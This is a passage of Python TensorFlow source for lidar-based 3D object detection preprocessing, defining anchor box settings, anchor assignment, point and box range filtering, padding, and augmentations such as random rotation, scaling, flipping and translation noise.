tf.identity(p.anchor_box_offsets), tf.identity(p.anchor_box_rotations))
features.anchor_bboxes = tf.reshape(anchor_bboxes,
base_shape + [num_box_per_center, 7])
return features
def TransformShapes(self, shapes):
p = self.params
base_shape = shapes.anchor_centers[:-1]
num_box_per_center = len(p.anchor_box_dimensions)
shapes.anchor_bboxes = base_shape.concatenate([num_box_per_center, 7])
return shapes
def TransformDTypes(self, dtypes):
dtypes.anchor_bboxes = tf.float32
return dtypes
class _AnchorBoxSettings:
"""Helper class to parameterize and update anchor box settings."""
# Implementations should fill out the following class members.
DIMENSION_PRIORS = []
ROTATIONS = []
CENTER_X_OFFSETS = []
CENTER_Y_OFFSETS = []
CENTER_Z_OFFSETS = []
@classmethod
def NumAnchors(cls):
return np.prod([
len(cls.DIMENSION_PRIORS),
len(cls.ROTATIONS),
len(cls.CENTER_X_OFFSETS),
len(cls.CENTER_Y_OFFSETS),
len(cls.CENTER_Z_OFFSETS)
])
@classmethod
def GenerateAnchorSettings(cls):
"""Generate anchor settings.
Returns:
A `NestedMap` containing three lists of the same length:
- anchor_box_dimensions
- anchor_box_rotations
- anchor_box_offsets
These can be used with the TileAnchorBBoxes preprocessor.
"""
anchor_box_dimensions = []
anchor_box_rotations = []
anchor_box_offsets = []
# The following is equivalent to a formulation of itertools.product, but
# is explicitly listed for readability.
# *Please note*: The ordering is important for ModelV2, which makes
# assumptions that the offset dimensions come first.
for cx in cls.CENTER_X_OFFSETS:
for cy in cls.CENTER_Y_OFFSETS:
for cz in cls.CENTER_Z_OFFSETS:
for rot in cls.ROTATIONS:
for dims in cls.DIMENSION_PRIORS:
anchor_box_dimensions += [dims]
anchor_box_rotations += [rot]
anchor_box_offsets += [(cx, cy, cz)]
# Check one of the lists has entries.
assert anchor_box_dimensions
return py_utils.NestedMap(
anchor_box_dimensions=anchor_box_dimensions,
anchor_box_rotations=anchor_box_rotations,
anchor_box_offsets=anchor_box_offsets)
@classmethod
def Update(cls, params):
"""Updates anchor box settings from input configuration lists.
Given dimensions priors, rotations, and offsets, computes the cartesian
product of the settings.
Args:
params: The KITTIAnchorExtractorBase.Params() object to update.
Returns:
Params updated with the anchor settings.
In total there are N combinations, where each (anchor_box_dimensions[i],
anchor_box_rotations[i], anchor_box_offsets[i]) for i in range(N) is an
option.
"""
p = params
settings = cls.GenerateAnchorSettings()
p.anchor_box_dimensions = settings.anchor_box_dimensions
p.anchor_box_rotations = settings.anchor_box_rotations
p.anchor_box_offsets = settings.anchor_box_offsets
return p
def MakeAnchorBoxSettings(dimension_priors, rotations, center_x_offsets,
center_y_offsets, center_z_offsets):
"""Returns a configured class for setting anchor box settings."""
class CustomAnchorBoxSettings(_AnchorBoxSettings):
DIMENSION_PRIORS = dimension_priors
ROTATIONS = rotations
CENTER_X_OFFSETS = center_x_offsets
CENTER_Y_OFFSETS = center_y_offsets
CENTER_Z_OFFSETS = center_z_offsets
return CustomAnchorBoxSettings
class SparseCarV1AnchorBoxSettings(_AnchorBoxSettings):
"""Anchor box settings for training on Cars for Sparse models."""
# Borrowed from PointPillar dimension prior for cars.
DIMENSION_PRIORS = [(1.6, 3.9, 1.56)]
# 4 Rotations with axis aligned and both diagonals.
ROTATIONS = [0, np.pi / 2, np.pi / 4, 3 * np.pi / 4]
# 25 offsets per anchor box with fixed z offset at -1.
CENTER_X_OFFSETS = np.linspace(-1.5, 1.5, 5)
CENTER_Y_OFFSETS = np.linspace(-1.5, 1.5, 5)
CENTER_Z_OFFSETS = [-1.]
class PointPillarAnchorBoxSettingsCar(_AnchorBoxSettings):
DIMENSION_PRIORS = [(1.6, 3.9, 1.56)]
ROTATIONS = [0, np.pi / 2]
# Fixed offset for every anchor box, based on a reading of the paper / code
# 0 offsets for x and y, and -1 for z.
CENTER_X_OFFSETS = [0.]
CENTER_Y_OFFSETS = [0.]
CENTER_Z_OFFSETS = [-1.]
class PointPillarAnchorBoxSettingsPed(PointPillarAnchorBoxSettingsCar):
DIMENSION_PRIORS = [(0.6, 0.8, 1.73)]
CENTER_Z_OFFSETS = [-0.6]
class PointPillarAnchorBoxSettingsCyc(PointPillarAnchorBoxSettingsCar):
DIMENSION_PRIORS = [(0.6, 1.76, 1.73)]
CENTER_Z_OFFSETS = [-0.6]
class PointPillarAnchorBoxSettingsPedCyc(PointPillarAnchorBoxSettingsCar):
DIMENSION_PRIORS = [(0.6, 0.8, 1.7), (0.6, 1.76, 1.73)]
CENTER_Z_OFFSETS = [-0.6]
class AnchorAssignment(Preprocessor):
"""Perform anchor assignment on the features.
This preprocessor expects features to contain the following keys:
- anchor_bboxes of shape [...base shape..., 7]
- labels.bboxes_3d
- labels.labels
- labels.bboxes_3d_mask
Adds the following features:
anchor_localization_residuals: base_shape + [7] floating point tensor of
residuals. The model is expected to regress against these residuals as
targets. The residuals can be converted back into bboxes using
detection_3d_lib.Utils3D.ResidualsToBBoxes.
assigned_gt_idx: base_shape - The corresponding index of the ground
truth bounding box for each anchor box in anchor_bboxes, anchors not
assigned will have idx be set to -1.
assigned_gt_bbox: base_shape + [7] - The corresponding ground
truth bounding box for each anchor box in anchor_bboxes.
assigned_gt_labels: base_shape - The assigned groundtruth label
for each anchor box.
assigned_gt_similarity_score: base_shape - The similarity score
for each assigned anchor box.
assigned_cls_mask: base_shape mask for classification loss per anchor.
This should be 1.0 if the anchor has a foreground or background
assignment; otherwise, it will be assigned to 0.0.
assigned_reg_mask: base_shape mask for regression loss per anchor.
This should be 1.0 if the anchor has a foreground assignment;
otherwise, it will be assigned to 0.0.
Note: background anchors do not have regression targets.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define(
'foreground_assignment_threshold', 0.5,
'Score (usually IOU) threshold for assigning a box as foreground.')
p.Define(
'background_assignment_threshold', 0.35,
'Score (usually IOU) threshold for assigning a box as background.')
return p
def TransformFeatures(self, features):
p = self.params
utils_3d = detection_3d_lib.Utils3D()
# anchor_bboxes will be returned with shape [#centers, #boxes_per_center, 7]
# flatten boxes here for matching.
base_shape = py_utils.GetShape(features.anchor_bboxes)[:-1]
anchor_bboxes = tf.reshape(features.anchor_bboxes, [-1, 7])
assigned_anchors = utils_3d.AssignAnchors(
anchor_bboxes,
features.labels.bboxes_3d,
features.labels.labels,
features.labels.bboxes_3d_mask,
foreground_assignment_threshold=p.foreground_assignment_threshold,
background_assignment_threshold=p.background_assignment_threshold)
# Add new features.
features.assigned_gt_idx = tf.reshape(assigned_anchors.assigned_gt_idx,
base_shape)
features.assigned_gt_bbox = tf.reshape(assigned_anchors.assigned_gt_bbox,
base_shape + [7])
features.assigned_gt_labels = tf.reshape(
assigned_anchors.assigned_gt_labels, base_shape)
features.assigned_gt_similarity_score = tf.reshape(
assigned_anchors.assigned_gt_similarity_score, base_shape)
features.assigned_cls_mask = tf.reshape(assigned_anchors.assigned_cls_mask,
base_shape)
features.assigned_reg_mask = tf.reshape(assigned_anchors.assigned_reg_mask,
base_shape)
# Compute residuals.
features.anchor_localization_residuals = utils_3d.LocalizationResiduals(
features.anchor_bboxes, features.assigned_gt_bbox)
return features
def TransformShapes(self, shapes):
base_shape = shapes.anchor_bboxes[:-1]
box_shape = base_shape.concatenate([7])
shapes.anchor_localization_residuals = box_shape
shapes.assigned_gt_idx = base_shape
shapes.assigned_gt_bbox = box_shape
shapes.assigned_gt_labels = base_shape
shapes.assigned_gt_similarity_score = base_shape
shapes.assigned_cls_mask = base_shape
shapes.assigned_reg_mask = base_shape
return shapes
def TransformDTypes(self, dtypes):
dtypes.anchor_localization_residuals = tf.float32
dtypes.assigned_gt_idx = tf.int32
dtypes.assigned_gt_bbox = tf.float32
dtypes.assigned_gt_labels = tf.int32
dtypes.assigned_gt_similarity_score = tf.float32
dtypes.assigned_cls_mask = tf.float32
dtypes.assigned_reg_mask = tf.float32
return dtypes
class DropLaserPointsOutOfRange(Preprocessor):
"""Drops laser points that are out of pre-defined x/y/z ranges.
This preprocessor expects features to contain the following keys:
- lasers.points_xyz of shape [P, 3]
- lasers.points_feature of shape [P, F]
and optionally points_padding of shape [P] corresponding to the padding.
if points_padding is None, then all points are considered valid.
Modifies the following features:
Removes or sets padding to 1 for all points outside a given range. Modifies
all items in the lasers subdictionary like lasers.points_xyz,
lasers.points_feature, lasers.points_padding, and optionally
lasers.points_label, lasers.points_bbox_id.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('keep_x_range', (-np.inf, np.inf),
'Only points that have x coordinates within this range are kept.')
p.Define('keep_y_range', (-np.inf, np.inf),
'Only points that have y coordinates within this range are kept.')
p.Define(
'keep_z_range', (-np.inf, np.inf),
'Only points that have z coordinates within this range are kept. '
'Approximate ground-removal can be performed by specifying a '
'lower-bound on the z-range.')
return p
def TransformFeatures(self, features):
p = self.params
points_xyz = features.lasers.points_xyz
if 'points_padding' in features.lasers:
points_mask = tf.cast(1 - features.lasers.points_padding, tf.bool)
else:
# All points are real, we keep points unpadded by applying boolean_mask
# on points_mask later.
points_mask = tf.ones_like(points_xyz[:, 0], dtype=tf.bool)
min_x, max_x = p.keep_x_range
min_y, max_y = p.keep_y_range
min_z, max_z = p.keep_z_range
# Short-circuit if all ranges are set to -inf, inf.
if (np.all(np.isneginf([min_x, min_y, min_z])) and
np.all(np.isposinf([max_x, max_y, max_z]))):
return features
if min_x != -np.inf:
points_mask &= points_xyz[:, 0] >= min_x
if min_y != -np.inf:
points_mask &= points_xyz[:, 1] >= min_y
if min_z != -np.inf:
points_mask &= points_xyz[:, 2] >= min_z
if max_x != np.inf:
points_mask &= points_xyz[:, 0] <= max_x
if max_y != np.inf:
points_mask &= points_xyz[:, 1] <= max_y
if max_z != np.inf:
points_mask &= points_xyz[:, 2] <= max_z
if 'points_padding' in features.lasers:
# Suffices to just update the padding.
features.lasers.points_padding = 1. - tf.cast(points_mask, tf.float32)
else:
features.lasers = features.lasers.Transform(
_GetApplyPointMaskFn(points_mask))
return features
def TransformShapes(self, shapes):
return shapes
def TransformDTypes(self, dtypes):
return dtypes
class KITTIDropPointsOutOfFrustum(Preprocessor):
"""Drops laser points that are outside of the camera frustum.
This preprocessor expects features to contain the following keys:
- lasers.points_xyz of shape [P, 3]
- lasers.points_feature of shape [P, F]
- images.velo_to_image_plane of shape [3, 4]
- images.width of shape [1]
- images.height of shape [1]
and optionally points_padding of shape [P] corresponding to the padding.
if points_padding is None, then all points are considered valid.
Modifies the following features:
lasers.points_xyz, lasers.points_feature, lasers.points_padding, and
optionally lasers.points_label, lasers.points_bbox_id so that
points outside the frustum have padding set to 1 or are removed.
"""
def TransformFeatures(self, features):
# Drop points behind the car (behind x-axis = 0).
images = features.images
front_indices = features.lasers.points_xyz[:, 0] >= 0
if 'points_padding' not in features.lasers:
# Keep tensors unpadded and small using boolean_mask.
features.lasers.points_xyz = tf.boolean_mask(features.lasers.points_xyz,
front_indices)
features.lasers.points_feature = tf.boolean_mask(
features.lasers.points_feature, front_indices)
# Drop those points outside the image plane.
points_image = geometry.PointsToImagePlane(features.lasers.points_xyz,
images.velo_to_image_plane)
in_image_plane = (
(points_image[:, 0] >= 0) &
(points_image[:, 0] <= tf.cast(images.width, tf.float32)) &
(points_image[:, 1] >= 0) &
(points_image[:, 1] <= tf.cast(images.height, tf.float32)))
if 'points_padding' in features.lasers:
# Update padding to only include front indices and in image plane.
points_mask = tf.cast(1 - features.lasers.points_padding, tf.bool)
points_mask &= front_indices
points_mask &= in_image_plane
features.lasers.points_padding = 1. - tf.cast(points_mask, tf.float32)
else:
features.lasers = features.lasers.Transform(
_GetApplyPointMaskFn(in_image_plane))
return features
def TransformShapes(self, shapes):
return shapes
def TransformDTypes(self, dtypes):
return dtypes
class RandomWorldRotationAboutZAxis(Preprocessor):
"""Rotates the world randomly as a form of data augmentation.
Rotations are performed around the *z-axis*. This assumes that the car is
always level. In general, we'd like to instead rotate the car on the spot,
this would then make sense for cases where the car is on a slope.
When there are leading dimensions, this will rotate the boxes with the same
transformation across all the frames. This is useful when the input is a
sequence of frames from the same run segment.
This preprocessor expects features to contain the following keys:
- lasers.points_xyz of shape [..., 3]
- labels.bboxes_3d of shape [..., 7]
Modifies the following features:
lasers.points_xyz, labels.bboxes_3d with the same rotation applied to both.
Adds the following features:
world_rot_z which contains the rotation applied to the example.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define(
'max_rotation', None,
'The rotation amount will be randomly picked from '
'[-max_rotation, max_rotation).')
p.Define(
'include_world_rot_z', True,
'Whether to include the applied rotation as an additional tensor. '
'It can be helpful to disable this when using the preprocessor in a '
'way that expects the structure of the features to be the same '
'(e.g., as a branch in tf.cond).')
return p
def __init__(self, params):
super().__init__(params)
p = self.params
if p.max_rotation is None:
raise ValueError('max_rotation needs to be specified, instead of None.')
def TransformFeatures(self, features):
p = self.params
rot = tf.random.uniform((),
minval=-p.max_rotation,
maxval=p.max_rotation,
seed=p.random_seed)
# Rotating about the z-axis is equal to experiencing yaw.
pose = [0., 0., 0., rot, 0., 0.]
# Rotate points.
features.lasers.points_xyz = geometry.CoordinateTransform(
features.lasers.points_xyz, pose)
# Rotate bboxes, note that heading has a special case.
bboxes_xyz = features.labels.bboxes_3d[..., :3]
bboxes_dims = features.labels.bboxes_3d[..., 3:6]
bboxes_rot = features.labels.bboxes_3d[..., 6:]
bboxes_xyz = geometry.CoordinateTransform(bboxes_xyz, pose)
# The heading correction should subtract rot from the bboxes rotations.
bboxes_rot = geometry.WrapAngleRad(bboxes_rot - rot)
features.labels.bboxes_3d = tf.concat([bboxes_xyz, bboxes_dims, bboxes_rot],
axis=-1)
if p.include_world_rot_z:
features.world_rot_z = rot
return features
def TransformShapes(self, shapes):
if self.params.include_world_rot_z:
shapes.world_rot_z = tf.TensorShape([])
return shapes
def TransformDTypes(self, dtypes):
if self.params.include_world_rot_z:
dtypes.world_rot_z = tf.float32
return dtypes
class DropPointsOutOfFrustum(Preprocessor):
"""Drops points outside of pre-defined theta / phi ranges.
Note that the ranges for keep_phi_range can be negative, this is because the
phi values wrap around 2*pi. Thus, a valid range that filters the 90 deg
frontal field of view of the car can be specified as [-pi/4, pi/4].
This preprocessor expects features to contain the following keys:
- lasers.points_xyz of shape [P, 3]
- lasers.points_feature of shape [P, F]
Modifies the following features:
- lasers.points_xyz removing any points out of frustum.
- lasers.points_feature removing any points out of frustum.
Note: We expect a downstream processor that filters out boxes with few points
to drop the corresponding bboxes.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('keep_theta_range', (0., np.pi),
'Only points that have theta coordinates within this range.')
p.Define('keep_phi_range', (0., 2. * np.pi),
'Only points that have phi coordinates within this range.')
return p
def TransformFeatures(self, features):
p = self.params
if 'points_padding' in features.lasers:
raise ValueError('DropPointsOutOfFrustum preprocessor does not support '
'padded lasers.')
points_xyz = features.lasers.points_xyz
points_feature = features.lasers.points_feature
min_theta, max_theta = p.keep_theta_range
if (min_theta < 0. or min_theta > np.pi or max_theta < 0. or
max_theta > np.pi):
raise ValueError('Valid values for theta are between 0 and pi, '
'keep_theta_range={}'.format(p.keep_theta_range))
if min_theta > max_theta:
raise ValueError('min_theta must be <= max_theta, '
'keep_theta_range={}'.format(p.keep_theta_range))
min_phi, max_phi = p.keep_phi_range
if (min_phi < -2. * np.pi or min_phi > 2. * np.pi or
max_phi < -2. * np.pi or max_phi > 2. * np.pi):
raise ValueError('Valid values for phi are between -2*pi and 2*pi,'
'keep_phi_range={}'.format(p.keep_phi_range))
if min_phi > max_phi:
raise ValueError('min_phi must be <= max_phi, '
'keep_phi_range={}'.format(p.keep_phi_range))
_, theta, phi = tf.unstack(
geometry.SphericalCoordinatesTransform(points_xyz), axis=-1)
# phi is returned in range [-pi, pi], we shift the values which are between
# [-pi, 0] to be [pi, 2pi] instead to make the logic below easier to follow.
# Hence, all phi values after this will be [0, 2pi].
phi = tf.where(phi >= 0., phi, 2. * np.pi + phi)
# Theta does not have circular boundary conditions, a simple check suffices.
points_mask = (theta >= min_theta) & (theta <= max_theta)
if min_phi < 0. and max_phi < 0.:
# Both are less than zero, we just just add 2pi and will use the regular
# check.
min_phi += 2. * np.pi
max_phi += 2. * np.pi
if min_phi < 0.:
# The minimum threshold is below 0, so we split into checking between
# (0 to min_phi) and (0 to max_phi). Note that min_phi is negative, but
# phi is always positive, so we take 2*pi + min_phi to get the range of
# appropriate values.
points_mask &= (phi >= (2. * np.pi + min_phi)) | (phi <= max_phi)
else:
# Both must be greater than 0 if we get to this condition.
assert min_phi >= 0.
assert max_phi >= 0.
points_mask &= (phi >= min_phi) & (phi <= max_phi)
features.lasers.points_xyz = tf.boolean_mask(points_xyz, points_mask)
features.lasers.points_feature = tf.boolean_mask(points_feature,
points_mask)
return features
def TransformShapes(self, shapes):
return shapes
def TransformDTypes(self, dtypes):
return dtypes
class DropBoxesOutOfRange(Preprocessor):
"""Drops boxes outside of pre-defined x/y/z ranges (boundaries inclusive).
This preprocessor expects features to contain the following keys:
- labels.bboxes_3d of shape [N, 7]
- labels.bboxes_3d_mask of shape [N]
Modifies the following features:
- labels.bboxes_3d_mask to mask out any additional boxes.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('keep_x_range', (-np.inf, np.inf),
'Only boxes that have x coordinates within this range are kept.')
p.Define('keep_y_range', (-np.inf, np.inf),
'Only boxes that have y coordinates within this range are kept.')
p.Define('keep_z_range', (-np.inf, np.inf),
'Only boxes that have z coordinates within this range are kept.')
return p
def TransformFeatures(self, features):
p = self.params
min_x, max_x = p.keep_x_range
min_y, max_y = p.keep_y_range
min_z, max_z = p.keep_z_range
# Short-circuit if all ranges are set to -inf, inf.
if (np.all(np.isneginf([min_x, min_y, min_z])) and
np.all(np.isposinf([max_x, max_y, max_z]))):
return features
# For each bounding box, compute whether any of its extrema
# fall outside of the range.
bboxes_3d_corners = geometry.BBoxCorners(
features.labels.bboxes_3d[tf.newaxis, ...])[0]
bboxes_3d_corners = py_utils.HasShape(bboxes_3d_corners, [-1, 8, 3])
min_bbox_x = tf.reduce_min(bboxes_3d_corners[:, :, 0], axis=-1)
max_bbox_x = tf.reduce_max(bboxes_3d_corners[:, :, 0], axis=-1)
min_bbox_y = tf.reduce_min(bboxes_3d_corners[:, :, 1], axis=-1)
max_bbox_y = tf.reduce_max(bboxes_3d_corners[:, :, 1], axis=-1)
min_bbox_z = tf.reduce_min(bboxes_3d_corners[:, :, 2], axis=-1)
max_bbox_z = tf.reduce_max(bboxes_3d_corners[:, :, 2], axis=-1)
mask = (
tf.math.logical_and(min_bbox_x >= min_x, max_bbox_x <= max_x)
& tf.math.logical_and(min_bbox_y >= min_y, max_bbox_y <= max_y)
& tf.math.logical_and(min_bbox_z >= min_z, max_bbox_z <= max_z))
max_num_boxes = py_utils.GetShape(features.labels.bboxes_3d_mask)
mask = py_utils.HasShape(mask, max_num_boxes)
features.labels.bboxes_3d_mask *= tf.cast(mask, tf.float32)
return features
def TransformShapes(self, shapes):
return shapes
def TransformDTypes(self, dtypes):
return dtypes
class PadLaserFeatures(Preprocessor):
"""Pads laser features so that the dimensions are fixed.
This preprocessor expects features to contain the following keys:
- lasers.points_xyz of shape [P, 3]
- lasers.points_feature of shape [P, F]
and optionally points_padding of shape [P] corresponding to the padding.
if points_padding is None, then all points are considered valid.
Modifies the following features:
lasers.points_xyz and lasers.points_feature to add padding.
Optionally also modifies lasers.points_label and lasers.points_bbox_id
if they exist to add padding.
Modifies/adds the following features:
labels.points_padding of shape [P] representing the padding.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('max_num_points', 128500,
'Max number of points to pad the points to.')
return p
def TransformFeatures(self, features):
p = self.params
if 'points_padding' in features.lasers:
points_mask = 1 - features.lasers.points_padding
points_mask = tf.cast(points_mask, tf.bool)
features.lasers = features.lasers.Transform(
_GetApplyPointMaskFn(points_mask))
npoints = tf.shape(features.lasers.points_xyz)[0]
features.lasers.points_padding = tf.ones([npoints])
shuffled_idx = tf.range(npoints)
shuffled_idx = tf.random.shuffle(shuffled_idx, seed=p.random_seed)
def _PadOrTrimFn(points_tensor):
# Shuffle before trimming so we have a random sampling
points_tensor = tf.gather(points_tensor, shuffled_idx)
return py_utils.PadOrTrimTo(points_tensor, [p.max_num_points] +
points_tensor.shape[1:].as_list())
features.lasers = features.lasers.Transform(_PadOrTrimFn)
features.lasers.points_padding = 1.0 - features.lasers.points_padding
return features
def TransformShapes(self, shapes):
p = self.params
def _TransformShape(points_shape):
return tf.TensorShape([p.max_num_points] + points_shape[1:].as_list())
shapes.lasers = shapes.lasers.Transform(_TransformShape)
shapes.lasers.points_padding = tf.TensorShape([p.max_num_points])
return shapes
def TransformDTypes(self, dtypes):
dtypes.lasers.points_padding = tf.float32
return dtypes
class WorldScaling(Preprocessor):
"""Scale the world randomly as a form of data augmentation.
This preprocessor expects features to contain the following keys:
- lasers.points_xyz of shape [P, 3]
- labels.bboxes_3d of shape [L, 7]
Modifies the following features:
lasers.points_xyz, labels.bboxes_3d with the same scaling applied to both.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('scaling', None, 'The scaling range.')
return p
def __init__(self, params):
super().__init__(params)
p = self.params
if p.scaling is None:
raise ValueError('scaling needs to be specified, instead of None.')
if len(p.scaling) != 2:
raise ValueError('scaling needs to be a list of two elements.')
def TransformFeatures(self, features):
p = self.params
scaling = tf.random.uniform((),
minval=p.scaling[0],
maxval=p.scaling[1],
seed=p.random_seed,
dtype=features.lasers.points_xyz.dtype)
# Scale points [num_points, 3].
features.lasers.points_xyz *= scaling
# Scaling bboxes (location and dimensions).
bboxes_xyz = features.labels.bboxes_3d[..., :3] * scaling
bboxes_dims = features.labels.bboxes_3d[..., 3:6] * scaling
bboxes_rot = features.labels.bboxes_3d[..., 6:]
features.labels.bboxes_3d = tf.concat([bboxes_xyz, bboxes_dims, bboxes_rot],
axis=-1)
return features
def TransformShapes(self, shapes):
return shapes
def TransformDTypes(self, dtypes):
return dtypes
class RandomDropLaserPoints(Preprocessor):
"""Randomly dropout laser points and the corresponding features.
This preprocessor expects features to contain the following keys:
- lasers.points_xyz of shape [P, 3]
- lasers.points_feature of shape [P, F]
Modifies the following features:
lasers.points_xyz, lasers.points_feature.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('keep_prob', 0.95, 'Probability for keeping points.')
return p
def TransformFeatures(self, features):
p = self.params
num_points, _ = py_utils.GetShape(features.lasers.points_xyz)
pts_keep_sample_prob = tf.random.uniform([num_points],
minval=0,
maxval=1,
seed=p.random_seed)
pts_keep_mask = pts_keep_sample_prob < p.keep_prob
if 'points_padding' in features.lasers:
# Update points_padding so that where pts_keep_mask is True,
# points_padding remains 0.
points_mask = 1 - features.lasers.points_padding
points_mask *= tf.cast(pts_keep_mask, tf.float32)
features.lasers.points_padding = 1 - points_mask
else:
features.lasers.points_xyz = tf.boolean_mask(features.lasers.points_xyz,
pts_keep_mask)
features.lasers.points_feature = tf.boolean_mask(
features.lasers.points_feature, pts_keep_mask)
return features
def TransformShapes(self, shapes):
return shapes
def TransformDTypes(self, dtypes):
return dtypes
class RandomFlipY(Preprocessor):
"""Flip the world along axis Y as a form of data augmentation.
When there are leading dimensions, this will flip the boxes with the same
transformation across all the frames. This is useful when the input is a
sequence of frames from the same run segment.
This preprocessor expects features to contain the following keys:
- lasers.points_xyz of shape [..., 3]
- labels.bboxes_3d of shape [..., 7]
Modifies the following features:
lasers.points_xyz, labels.bboxes_3d with the same flipping applied to both.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('flip_probability', 0.5, 'Probability of flipping.')
return p
def TransformFeatures(self, features):
p = self.params
threshold = 1. - p.flip_probability
choice = tf.random.uniform(
(), minval=0.0, maxval=1.0, seed=p.random_seed) >= threshold
# Flip points
points_xyz = features.lasers.points_xyz
points_y = tf.where(choice, -points_xyz[..., 1:2], points_xyz[..., 1:2])
features.lasers.points_xyz = tf.concat(
[points_xyz[..., 0:1], points_y, points_xyz[..., 2:3]], axis=-1)
# Flip boxes
bboxes_xyz = features.labels.bboxes_3d[..., :3]
bboxes_y = tf.where(choice, -bboxes_xyz[..., 1:2], bboxes_xyz[..., 1:2])
bboxes_xyz = tf.concat(
[bboxes_xyz[..., 0:1], bboxes_y, bboxes_xyz[..., 2:3]], axis=-1)
# Compensate rotation.
bboxes_dims = features.labels.bboxes_3d[..., 3:6]
bboxes_rot = features.labels.bboxes_3d[..., 6:]
bboxes_rot = tf.where(choice, geometry.WrapAngleRad(-bboxes_rot),
bboxes_rot)
features.labels.bboxes_3d = tf.concat([bboxes_xyz, bboxes_dims, bboxes_rot],
axis=-1)
return features
def TransformShapes(self, shapes):
return shapes
def TransformDTypes(self, dtypes):
return dtypes
class GlobalTranslateNoise(Preprocessor):
"""Add global translation noise of xyz coordinates to points and boxes.
This preprocessor expects features to contain the following keys:
- lasers.points_xyz of shape [P, 3]
- labels.bboxes_3d of shape [L, 7]
Modifies the following features:
lasers.points_xyz, labels.bboxes_3d with the same
random translation noise applied to both.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('noise_std', [0.2, 0.2, 0.2],
'Standard deviation of translation noise per axis.')
return p
def TransformFeatures(self, features):
p = self.params
# Use three different seeds but the same base seed so
# that the values are different.
base_seed = p.random_seed
x_seed = base_seed
y_seed = None if base_seed is None else base_seed + 1
z_seed = None if base_seed is None else base_seed + 2
random_translate_x = tf.random.normal((),
mean=0.0,
stddev=p.noise_std[0],
seed=x_seed)
random_translate_y = tf.random.normal((),
mean=0.0,
stddev=p.noise_std[1],
seed=y_seed)
random_translate_z = tf.random.normal((),
mean=0.0,
stddev=p.noise_std[2],
seed=z_seed)
pose = tf.stack([
random_translate_x, random_translate_y, random_translate_z, 0.0, 0.0,
0.0
],
axis=0)
# Translate points.
points_xyz = features.lasers.points_xyz
features.lasers.points_xyz = geometry.CoordinateTransform(points_xyz, pose)
# Translate boxes
bboxes_xyz = features.labels.bboxes_3d[..., :3]
bboxes_xyz = geometry.CoordinateTransform(bboxes_xyz, pose)
features.labels.bboxes_3d = tf.concat(
[bboxes_xyz, features.labels.bboxes_3d[..., 3:]], axis=-1)
return features
def TransformShapes(self, shapes):
return shapes
def TransformDTypes(self, dtypes):
return dtypes
class RandomBBoxTransform(Preprocessor):
"""Randomly transform bounding boxes and the points inside them.
This preprocessor expects features to contain the following keys:
- lasers.points_xyz of shape [P, 3]
- lasers.points_feature of shape [P, F]
- lasers.points_padding of shape [P]
- labels.bboxes_3d of shape [L, 7]
- labels.bboxes_3d_mask of shape [L]
Modifies the following features:
lasers.points_{xyz,feature,padding}, labels.bboxes_3d with the
transformed bounding boxes and points.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define(
'max_rotation', None,
'The rotation amount will be randomly picked from '
'[-max_rotation, max_rotation).')
# At the moment we don't use this because it can cause boxes to collide with
# each other. We need to compute box intersections when deciding whether to
# apply the translation jitter. Theoretically we should also do this for
# rotation.
p.Define('noise_std', [0.0, 0.0, 0.0],
'Standard deviation of translation noise per axis.')
p.Define(
'max_scaling', None,
'An optional float list of length 3. When max_scaling is not none, '
'delta parameters s_x, s_y, s_z are drawn from '
'[-max_scaling[i], max_scaling[i]] where i is in [0, 2].')
p.Define(
'max_shearing', None,
'An optional float list of length 6. When max_shearing is not none, '
'shearing parameters sh_x^y, sh_x^z, sh_y^x, sh_y^z, sh_z^x, sh_z^y are'
'drawn from [-max_shearing[i], max_shearing[i]], where i is in [0, 5].')
p.Define(
'max_num_points_per_bbox', 16384,
'The maximum number of points that fall within a bounding box. '
'Bounding boxes with more points than this value will '
'have some points droppped.')
return p
def __init__(self, params):
super().__init__(params)
p = self.params
if p.max_rotation is None:
raise ValueError('max_rotation needs to be specified, instead of None.')
if p.max_scaling is not None:
if len(p.max_scaling) != 3:
raise ValueError('max_scaling needs to be specified as either None or '
'list of 3 floating point numbers, instead of {}.'
''.format(p.max_scaling))
if p.max_shearing is not None:
if len(p.max_shearing) != 6:
raise ValueError('max_shearing needs to be specified as either None or '
'list of 6 floating point numbers, instead of {}.'
''.format(p.max_shearing))
def _Foreground(self, features, points_xyz, points_feature, real_bboxes_3d,
points_in_bbox_mask, rotation, translate_pose, transform_fn):
"""Extract and transform foreground points and features."""
out_bbox_xyz, out_bbox_feature, out_bbox_mask = self._ForLoopBuffers(
features)
# Only iterate over the actual number of boxes in the scene.
actual_num_bboxes = tf.reduce_sum(
tf.cast(features.labels.bboxes_3d_mask, tf.int32))
ret = py_utils.ForLoop(
body=transform_fn,
start=0,
limit=actual_num_bboxes,
delta=1,
loop_state=py_utils.NestedMap(
points_xyz=points_xyz,
points_feature=points_feature,
bboxes_3d=real_bboxes_3d,
points_in_bbox_mask=points_in_bbox_mask,
rotation=rotation,
translate_pose=translate_pose,
out_bbox_points=out_bbox_xyz,
out_bbox_feature=out_bbox_feature,
out_bbox_mask=out_bbox_mask))
# Gather all of the transformed points and features
out_bbox_xyz = tf.reshape(ret.out_bbox_points, [-1, 3])
num_features = features.lasers.points_feature.shape[-1]
out_bbox_feature = tf.reshape(ret.out_bbox_feature, [-1, num_features])
out_bbox_mask = tf.cast(tf.reshape(ret.out_bbox_mask, [-1]), tf.bool)
fg_xyz = tf.boolean_mask(out_bbox_xyz, out_bbox_mask)
fg_feature = tf.boolean_mask(out_bbox_feature, out_bbox_mask)
return fg_xyz, fg_feature
def _Background(self, points_xyz, points_feature, points_in_bbox_mask):
# If a point is in any bounding box, it is a foreground point.
foreground_points_mask = tf.reduce_any(points_in_bbox_mask, axis=-1)
# All others are background. We rotate all of the foreground points to
# final_points_* and keep the background points unchanged
background_points_mask = tf.math.logical_not(foreground_points_mask)
background_points_xyz = tf.boolean_mask(points_xyz, background_points_mask)
background_points_feature = tf.boolean_mask(points_feature,
background_points_mask)
return background_points_xyz, background_points_feature
def _ForLoopBuffers(self, features):
